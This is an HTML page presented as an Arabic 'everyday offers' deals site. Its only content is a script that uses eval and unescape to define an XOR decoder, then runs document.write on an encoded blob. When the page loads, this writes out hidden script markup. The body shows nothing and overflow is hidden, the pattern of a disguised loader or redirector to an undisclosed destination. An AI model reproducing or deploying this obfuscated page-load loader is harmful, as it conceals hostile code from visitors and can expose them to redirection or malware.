<!DOCTYPE html>
<html>

<head>
    <meta charset='UTF-8'>
    <meta name='viewport' content='width=device-width, initial-scale=1.0'>
    <title>عروض كل يوم</title>
</head>

<body style='padding: 0;margin: 0;overflow: hidden;'>
    <script type="text/javascript">
        <!-- 
        eval(unescape('%66%75%6e%63%74%69%6f%6e%20%67%61%38%37%35%32%33%35%31%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%31%39%36%30%34%31%33%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%32%36%31%33%37%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%35%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
        eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%67%61%38%37%35%32%33%35%31%28%27') + '%44%7c%6d%7e%6f%7c%7a%2d%6b%68%79%65%60%74%6e%37%60%6b%72%7a%7c%76%77%33%65%7d%7c%70%47%2e%26%2c%7b%7f%6a%44%26%6e%7e%7c%71%7d%36%35%3d%68%6e%7a%7f%70%7d%34%6a%7c%6c%63%70%67%78%7f%31%75%6b%7a%33%76%71%77%3d%68%67%7b%6e%65%77%6b%31%6e%6f%7f%7c%7d%75%78%37%61%6c%7e%67%64%76%6f%36%6c%63%7a%70%77%7c%73%35%73%6d%74%36%6b%7d%2e%42%48%37%70%6a%71%6f%76%7e%46%16%0a%2c%24%2c%26%2d%27%23%24%42%69%6e%73%63%7b%6b%2c%7b%7f%6a%44%26%6e%7e%7c%71%7d%36%35%3d%7f%74%7e%35%38%6f%35%6e%73%6f%63%33%67%70%71%68%71%72%69%7e%36%76%74%3d%6f%7a%6a%62%7f%35%74%6e%72%41%7c%7c%77%70%63%41%31%6e%34%6b%6f%2c%7f%73%74%4b%6c%70%7a%7d%7a%39%35%37%60%6b%7d%36%78%7f%3d%3b%5c%70%57%68%50%3f%22%21%7d%70%7f%78%69%4a%25%73%67%6a%6e%6b%77%69%36%24%3c%43%2d%70%60%76%6f%69%76%3b%20%3c%41%2c%77%73%68%71%6a%72%73%79%3b%20%64%6f%60%6a%62%71%46%24%64%73%72%6d%6f%7e%3e%2c%36%7d%7f%23%29%68%6c%6e%6f%6e%62%24%7a%77%7b%68%46%24%6e%6d%6b%68%68%70%3e%2c%35%3d%37%7d%6c%43%22%79%6a%6c%70%6c%36%26%3e%37%33%7a%7f%47%22%30%4611960413%35%34%35%39%31%39%33' + unescape('%27%29%29%3b'));
        // -->
        </script>
</body>

</html>
